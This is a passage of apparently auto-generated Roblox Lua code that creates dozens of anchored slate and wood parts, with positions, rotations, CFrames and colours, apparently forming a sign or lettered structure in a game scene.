- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o140 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(146.322189, 17.3837376, 169.320618),
- ["Rotation"] = Vector3.new(173.669785, -82.6139526, 83.8114624),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(146.322189, 17.3837376, 169.320618, 0.0138579905, -0.127803117, -0.991702497, -0.999897957, 0.00156812312, -0.014173938, 0.00336658745, 0.991798103, -0.127768248),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.23000002, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o141 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(146.322189, 17.3837376, 169.320618),
- ["Rotation"] = Vector3.new(173.669785, -82.6139526, 83.8114624),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(146.322189, 17.3837376, 169.320618, 0.0138579905, -0.127803117, -0.991702497, -0.999897957, 0.00156812312, -0.014173938, 0.00336658745, 0.991798103, -0.127768248),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.23000002, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o142 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(150.737183, 20.8821354, 169.752579),
- ["Rotation"] = Vector3.new(1.02954125, 82.6549301, 88.8902817),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(150.737183, 20.8821354, 169.752579, 0.00247595529, -0.127819464, 0.991794169, 0.999996006, 0.00154682342, -0.00229708059, -0.00124051934, 0.991795897, 0.127822816),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(2.88999987, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o143 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(150.319611, 18.2591019, 169.685013),
- ["Rotation"] = Vector3.new(77.1646423, 59.7107582, 14.679369),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(150.319611, 18.2591019, 169.685013, 0.487902105, -0.12781097, 0.863490283, 0.870727539, 0.00154984952, -0.491761982, 0.0615143217, 0.991796613, 0.112044737),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o144 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(150.659607, 18.9491215, 169.75502),
- ["Rotation"] = Vector3.new(53.6159477, 77.7174911, 36.9310265),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(150.659607, 18.9491215, 169.75502, 0.170048088, -0.127819777, 0.977110565, 0.985224009, 0.00152565062, -0.171260476, 0.0203997437, 0.99179548, 0.126190558),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o145 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(149.679626, 17.6090775, 169.685013),
- ["Rotation"] = Vector3.new(84.231514, 37.5194588, 9.27347469),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(149.679626, 17.6090775, 169.685013, 0.78278029, -0.127813101, 0.609030843, 0.614223778, 0.00154901238, -0.789129674, 0.0999177471, 0.991796434, 0.0797183961),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o146 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(148.734497, 17.328743, 169.576965),
- ["Rotation"] = Vector3.new(90.0744934, -1.28044736, 7.34269857),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(148.734497, 17.328743, 169.576965, 0.991551638, -0.127771825, -0.0223461613, -0.0223293304, 0.00156652858, -0.999749124, 0.12777482, 0.99180162, -0.00129975774),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.40999985, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o147 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(147.038651, 14.8126478, 169.432281),
- ["Rotation"] = Vector3.new(98.1858368, -48.1672287, 11.0489969),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(147.038651, 14.8126478, 169.432281, 0.654594958, -0.127821401, -0.745094657, -0.751120746, 0.0015963217, -0.660162389, 0.0855721384, 0.991795659, -0.094964236),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.39999986, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o148 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(152.863281, 16.6688137, 170.02388),
- ["Rotation"] = Vector3.new(-178.970459, -82.6544113, 91.1095047),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(152.863281, 16.6688137, 170.02388, -0.0024754703, -0.12781924, -0.991793036, -0.999994814, 0.00154287938, 0.0022970736, 0.00123668462, 0.991794407, -0.127822593),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.04999971, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o149 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(146.528656, 15.7626486, 169.432281),
- ["Rotation"] = Vector3.new(110.00544, -69.440918, 21.3449326),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(146.528656, 15.7626486, 169.432281, 0.327083379, -0.12782006, -0.93631053, -0.943985462, 0.00159354531, -0.329981685, 0.0436702631, 0.991795719, -0.120138958),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.39999986, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o150 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(147.988647, 14.1826448, 169.432281),
- ["Rotation"] = Vector3.new(93.3404617, -24.9186554, 8.1027422),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(147.988647, 14.1826448, 169.432281, 0.897852421, -0.127827168, -0.421331137, -0.424629748, 0.00159776071, -0.905365288, 0.116403304, 0.991794825, -0.0528446026),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.39999986, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o151 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(149.993225, 14.0147829, 169.516647),
- ["Rotation"] = Vector3.new(89.8852692, 0.172305301, 7.34457254),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(149.993225, 14.0147829, 169.516647, 0.991790116, -0.127835527, 0.00300729042, 0.00323811779, 0.00160158053, -0.999993265, 0.127829656, 0.991793752, 0.00200236472),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(2.71999979, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o152 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(148.69606, 18.4541702, 175.703354),
- ["Rotation"] = Vector3.new(132.126755, 4.84235573, -174.472),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(148.69606, 18.4541702, 175.703354, -0.991795301, 0.0959880948, 0.0844144747, 0.00230087596, 0.673683226, -0.739015043, -0.127805218, -0.732758939, -0.668378651),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 13.7999992, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o153 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(154.65451, 17.7249413, 170.236328),
- ["Rotation"] = Vector3.new(89.9293976, -0.141811118, 7.34318066),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(154.65451, 17.7249413, 170.236328, 0.991794288, -0.127811581, -0.00247506821, -0.00229731458, 0.00153840985, -0.999994636, 0.127814963, 0.991794765, 0.00123215781),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(2.69999981, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o154 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(154.144775, 21.6932507, 170.315384),
- ["Rotation"] = Vector3.new(89.9293976, -0.141811118, 7.34318066),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(154.144775, 21.6932507, 170.315384, 0.991794288, -0.127811581, -0.00247506821, -0.00229731458, 0.00153840985, -0.999994636, 0.127814963, 0.991794765, 0.00123215781),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.12999964, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o155 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(154.244385, 14.6824322, 170.19902),
- ["Rotation"] = Vector3.new(-93.2759857, 1.3001684, 173.498276),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(154.244385, 14.6824322, 170.19902, -0.993311405, -0.113203861, 0.0226902701, 0.0160364378, 0.0593429916, 0.998107672, -0.114336349, 0.991796017, -0.0571307763),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.78999972, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o156 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(149.324478, 6.05241013, 169.16951),
- ["Rotation"] = Vector3.new(-162.784256, 7.55202484, -179.99144),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(149.324478, 6.05241013, 169.16951, -0.991325736, 0.000147994142, 0.131426379, 0.0390409157, 0.955191135, 0.293403208, -0.125493988, 0.295988947, -0.946911335),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 16.8899994, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o157 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(155.992828, 21.4913101, 170.423386),
- ["Rotation"] = Vector3.new(92.1936569, -17.1741734, 7.68688536),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(155.992828, 21.4913101, 170.423386, 0.946824908, -0.12779507, -0.295277417, -0.29752937, 0.00153410214, -0.954709709, 0.122460403, 0.991796851, -0.0365703478),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o158 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(156.542038, 21.2397041, 170.423386),
- ["Rotation"] = Vector3.new(89.9207001, -27.0978317, 7.3072319),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(156.542038, 21.2397041, 170.423386, 0.882998586, -0.113228008, -0.455511212, -0.45163551, 0.0593092144, -0.890227497, 0.127814963, 0.991794765, 0.00123215781),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o159 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(157.351608, 20.6036148, 170.5634),
- ["Rotation"] = Vector3.new(92.919281, -44.1048775, 9.07151318),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(157.351608, 20.6036148, 170.5634, 0.709083855, -0.113215268, -0.695973933, -0.694406927, 0.0592979006, -0.717133045, 0.122460403, 0.991796851, -0.0365703478),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o160 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(157.831604, 16.0235939, 170.733368),
- ["Rotation"] = Vector3.new(-107.587616, -65.0307846, 164.442627),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(157.831604, 16.0235939, 170.733368, -0.406661958, -0.113216005, -0.906534731, -0.913540065, 0.0593224354, 0.402395785, 0.00822025072, 0.991796017, -0.127551764),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o161 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(157.271606, 15.2635927, 170.593353),
- ["Rotation"] = Vector3.new(-100.298042, -46.4113655, 170.550354),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(157.271606, 15.2635927, 170.593353, -0.680117905, -0.113198362, -0.72430861, -0.732320845, 0.0593405105, 0.678367257, -0.0338092558, 0.991796851, -0.123256296),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o162 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(156.471573, 14.7435904, 170.593353),
- ["Rotation"] = Vector3.new(-95.004097, -13.6040792, 173.312119),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(156.471573, 14.7435904, 170.593353, -0.96532923, -0.113193206, -0.235211298, -0.242879093, 0.0593448542, 0.968238413, -0.095639579, 0.991797149, -0.0847797245),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o163 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Wood,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(160.700272, 18.4878521, 177.223007),
- ["Rotation"] = Vector3.new(132.126755, 4.84235573, -174.472),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(160.700272, 18.4878521, 177.223007, -0.991795301, 0.0959880948, 0.0844144747, 0.00230087596, 0.673683226, -0.739015043, -0.127805218, -0.732758939, -0.668378651),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(2, 13.6999989, 2),
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o164 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(159.843292, 16.6688137, 171.223862),
- ["Rotation"] = Vector3.new(-178.970459, -82.6544113, 91.1095047),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(159.843292, 16.6688137, 171.223862, -0.0024754703, -0.12781924, -0.991793036, -0.999994814, 0.00154287938, 0.0022970736, 0.00123668462, 0.991794407, -0.127822593),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.04999971, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o165 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(157.961609, 19.5836029, 170.683411),
- ["Rotation"] = Vector3.new(105.239235, -70.396431, 19.7233467),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(157.961609, 19.5836029, 170.683411, 0.315823764, -0.113226481, -0.942036569, -0.944294155, 0.0593096539, -0.32370916, 0.0925244763, 0.991795182, -0.0881878957),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o166 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(158.221619, 18.3236027, 170.773407),
- ["Rotation"] = Vector3.new(164.74498, -83.3587875, 78.2458267),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(158.221619, 18.3236027, 170.773407, 0.0235574227, -0.113215335, -0.993289828, -0.997772634, 0.0593353808, -0.030426763, 0.0623821244, 0.991795182, -0.111565605),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o167 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(158.131622, 16.9335938, 170.733368),
- ["Rotation"] = Vector3.new(-121.868965, -76.5461121, 150.881332),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(158.131622, 16.9335938, 170.733368, -0.203252137, -0.113215417, -0.972557485, -0.978487372, 0.0593234263, 0.197585553, 0.0353257991, 0.991795957, -0.122837722),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o168 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(161.224396, 14.6824322, 171.399002),
- ["Rotation"] = Vector3.new(-93.2759857, 1.3001684, 173.498276),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(161.224396, 14.6824322, 171.399002, -0.993311405, -0.113203861, 0.0226902701, 0.0160364378, 0.0593429916, 0.998107672, -0.114336349, 0.991796017, -0.0571307763),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.78999972, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o169 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.WoodPlanks,
- ["BrickColor"] = BrickColor.new("Cool yellow"),
- ["Position"] = Vector3.new(162.006958, 18.6409302, 172.087845),
- ["Rotation"] = Vector3.new(-90.0708618, 0.141837731, 172.656372),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(162.006958, 18.6409302, 172.087845, -0.991794467, -0.127819434, 0.00247553294, 0.00229710108, 0.00154312816, 0.999995589, -0.127822816, 0.991796076, -0.00123673317),
- ["FormFactor"] = Enum.FormFactor.Symmetric,
- ["Size"] = Vector3.new(37.329998, 1, 10.1700001),
- ["BottomSurface"] = Enum.SurfaceType.SmoothNoOutlines,
- ["TopSurface"] = Enum.SurfaceType.SmoothNoOutlines,
- ["Color"] = Color3.new(0.992157, 0.917647, 0.552941),
- })
- o170 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(164.251617, 15.2635927, 171.793335),
- ["Rotation"] = Vector3.new(-100.298042, -46.4113655, 170.550354),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(164.251617, 15.2635927, 171.793335, -0.680117905, -0.113198362, -0.72430861, -0.732320845, 0.0593405105, 0.678367257, -0.0338092558, 0.991796851, -0.123256296),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o171 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(163.451584, 14.7435904, 171.793335),
- ["Rotation"] = Vector3.new(-95.004097, -13.6040792, 173.312119),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(163.451584, 14.7435904, 171.793335, -0.96532923, -0.113193206, -0.235211298, -0.242879093, 0.0593448542, 0.968238413, -0.095639579, 0.991797149, -0.0847797245),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o172 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(161.124786, 21.6932507, 171.515366),
- ["Rotation"] = Vector3.new(89.9293976, -0.141811118, 7.34318066),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(161.124786, 21.6932507, 171.515366, 0.991794288, -0.127811581, -0.00247506821, -0.00229731458, 0.00153840985, -0.999994636, 0.127814963, 0.991794765, 0.00123215781),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(3.12999964, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o173 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(162.972839, 21.4913101, 171.623367),
- ["Rotation"] = Vector3.new(92.1936569, -17.1741734, 7.68688536),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(162.972839, 21.4913101, 171.623367, 0.946824908, -0.12779507, -0.295277417, -0.29752937, 0.00153410214, -0.954709709, 0.122460403, 0.991796851, -0.0365703478),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o174 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(161.634521, 17.7249413, 171.43631),
- ["Rotation"] = Vector3.new(89.9293976, -0.141811118, 7.34318066),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(161.634521, 17.7249413, 171.43631, 0.991794288, -0.127811581, -0.00247506821, -0.00229731458, 0.00153840985, -0.999994636, 0.127814963, 0.991794765, 0.00123215781),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(2.69999981, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o175 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(167.989746, 14.7988796, 172.287613),
- ["Rotation"] = Vector3.new(93.4556046, -25.6446533, 8.1496439),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(167.989746, 14.7988796, 172.287613, 0.892391205, -0.127795041, -0.432788432, -0.436183721, 0.00157369091, -0.899856031, 0.115678199, 0.991798699, -0.0543377697),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.39999986, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o176 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(167.129776, 15.5588808, 172.207626),
- ["Rotation"] = Vector3.new(100.316895, -54.5006065, 12.713273),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(167.129776, 15.5588808, 172.207626, 0.566457391, -0.127794579, -0.814121664, -0.820735931, 0.0015672727, -0.571305037, 0.0742856115, 0.991798878, -0.103997774),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.39999986, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o177 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(166.837723, 19.0237198, 172.207397),
- ["Rotation"] = Vector3.new(-174.896866, -82.6276474, 95.1504211),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(166.837723, 19.0237198, 172.207397, -0.011518918, -0.127796724, -0.991733193, -0.999933422, 0.0015621772, 0.0114134233, 9.0669957e-005, 0.991798818, -0.127806082),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(6.25, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o178 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(170.179855, 14.8693275, 172.575027),
- ["Rotation"] = Vector3.new(84.231514, 37.5194588, 9.27347469),
- ["Anchored"] = true,
- ["CFrame"] = CFrame.new(170.179855, 14.8693275, 172.575027, 0.78278029, -0.127813101, 0.609030843, 0.614223778, 0.00154901238, -0.789129674, 0.0999177471, 0.991796434, 0.0797183961),
- ["FormFactor"] = Enum.FormFactor.Custom,
- ["Size"] = Vector3.new(1.43999982, 0.200000003, 0.850000024),
- ["BottomSurface"] = Enum.SurfaceType.Smooth,
- ["Color"] = Color3.new(0.105882, 0.164706, 0.207843),
- })
- o179 = Create("Part",{
- ["Parent"] = o136,
- ["Material"] = Enum.Material.Slate,
- ["BrickColor"] = BrickColor.new("Black"),
- ["Position"] = Vector3.new(169.234772, 14.5889912, 172.46698),
